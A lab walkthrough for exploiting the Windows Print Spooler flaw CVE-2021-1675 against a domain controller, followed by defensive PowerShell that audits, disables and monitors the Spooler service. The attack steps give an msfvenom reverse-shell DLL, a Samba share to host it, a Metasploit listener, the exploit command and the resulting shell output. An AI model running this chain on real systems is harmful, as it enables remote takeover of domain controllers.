OK so this one is doing the rounds on Twitter. A couple of researchers accidentally released their code for a vulnerability in the Windows Print Spooler service. This same service was hit by Stuxnet many moons ago. The vulnerability is a 0day, as the patch that was supposed to fix it does not do so at the time of writing this article. Windows 8 and above are impacted by this bug. The vulnerability allows for local and remote privilege escalation. If you search GitHub for 'CVE-2021-1675' you will find a bunch of remote and local public exploits.
Now, on to the Lab!
Disclaimer: this is a test lab environment, not production. Never run exploits or mess with production environments without explicit permission.
1. Set up a virtual machine environment. I am using VMware Workstation.
2. Set up 1 x Windows 2019 DC VM and 1 x Kali Linux VM.
3. Create a domain user on the DC and make sure its password is set (not flagged for change at login).
4. For the sake of this Lab, disable Windows Defender. Obfuscating and bypassing AV is out of scope for the payload in this exercise.
5. On the 2019 DC, enable guest logons for SMB. This is in lieu of setting up a member server to host your payload DLL, or modifying the exploit to connect to a share with a password, etc.
To enable guest SMB:
Start > Run > gpedit.msc, then Computer Configuration > Administrative Templates > Network > Lanman Workstation > Enable insecure guest logons, and set it to Enabled.
1. Download the Python exploit from cube0x0's GitHub.
2. Install cube0x0's fork of impacket (the setup.py lives inside the cloned directory):
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
3. From the Kali terminal, generate the payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.1.10 LPORT=4444 -f dll > shell-cmd.dll
Now move the DLL to /tmp:
cp ./shell-cmd.dll /tmp
4. Set up your SMB share:
Edit your /etc/samba/smb.conf to be as follows (the share is named smb, matching the UNC path used when the exploit is run):
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
5. Add a local user named smbuser and add it to Samba:
sudo useradd smbuser
sudo smbpasswd -a smbuser
6. Now set up the Metasploit listener. You can use revshells.com to generate these:
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.1.1.10; set lport 4444; exploit"
7. Run the exploit:
kali@kali:~/impacket$ ./CVE-2021-1675.py domain.local/dummy:Testing12345@10.1.1.1 '\\10.1.1.10\smb\shell-cmd.dll'
8. Check back on your Metasploit listener:
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.1.1.10:4444
[*] Sending stage (201283 bytes) to 10.1.1.1
[*] Meterpreter session 7 opened (10.1.1.10:4444 -> 10.1.1.1:65128) at 2021-07-01 08:42:15 -0400
meterpreter > shell
Process 5324 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
I found that after the Meterpreter session closed, the Spooler service on the DC would crash. Simply start it again from services.msc on the DC.
The exploit has multiple stages and retries. In my lab it worked on the first one and then reported failure on the second. The Meterpreter shell had already connected by then, though 🙂
Current mitigation centres on disabling the Print Spooler service on all domain PCs until the patch is out.
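On the defensive side, the two things a practitioner wants from this post are a way to apply the mitigation across the domain and a way to spot the Spooler crashes described above. The following PowerShell is an added example written for this page, not code from the original post or from cube0x0's project. It assumes PowerShell remoting (WinRM) is enabled on the targets, that the caller is a local administrator on them, and that the host names 'DC01' and 'WS01' are placeholders you replace with your own inventory (for example, the output of Get-ADComputer).

```powershell
# Added example (not part of the original post): audit, disable and monitor the
# Print Spooler service on a list of domain hosts. Host names are placeholders.

# Report whether the Spooler service exists, is running, and how it is set to start.
function Get-SpoolerStatus {
    param([string[]]$ComputerName)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Computer  = $env:COMPUTERNAME
            Present   = [bool]$svc
            Status    = if ($svc) { $svc.Status } else { 'N/A' }
            StartType = if ($svc) { $svc.StartType } else { 'N/A' }
        }
    }
}

# Apply the interim mitigation: stop the service and set it to Disabled so a
# reboot does not bring it back. Returns the resulting state for each host.
function Disable-Spooler {
    param([string[]]$ComputerName)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
        if ($svc) {
            if ($svc.Status -ne 'Stopped') { Stop-Service -Name Spooler -Force }
            Set-Service -Name Spooler -StartupType Disabled
            Get-Service -Name Spooler |
                Select-Object @{n='Computer';e={$env:COMPUTERNAME}}, Status, StartType
        }
    }
}

# Service Control Manager logs event 7031/7034 when a service terminates
# unexpectedly; the Spooler crash seen in the lab after the session closed
# shows up here. Worth alerting on, since a spooler that keeps dying is a
# signal something is being loaded into it that should not be.
function Get-SpoolerCrashEvents {
    param(
        [string[]]$ComputerName,
        [datetime]$Since = (Get-Date).AddDays(-7)
    )
    Invoke-Command -ComputerName $ComputerName -ArgumentList $Since -ScriptBlock {
        param($Since)
        Get-WinEvent -FilterHashtable @{
            LogName      = 'System'
            ProviderName = 'Service Control Manager'
            Id           = 7031, 7034
            StartTime    = $Since
        } -ErrorAction SilentlyContinue |
            Where-Object { $_.Message -match 'Print Spooler' } |
            Select-Object @{n='Computer';e={$env:COMPUTERNAME}}, TimeCreated, Id, Message
    }
}

# Placeholder host names; replace with Get-ADComputer output or your own inventory.
$hosts = 'DC01', 'WS01'
Get-SpoolerStatus -ComputerName $hosts | Format-Table -AutoSize
Get-SpoolerCrashEvents -ComputerName $hosts | Format-Table -Wrap
# Uncomment once you have confirmed which hosts genuinely need to print:
# Disable-Spooler -ComputerName $hosts | Format-Table -AutoSize
```

Run the audit first, then the crash query, and only then disable. Domain controllers almost never need a local spooler, so they are the obvious place to start; print servers and workstations that rely on printing need a decision rather than a blanket change, which is why the Disable-Spooler call is left commented out.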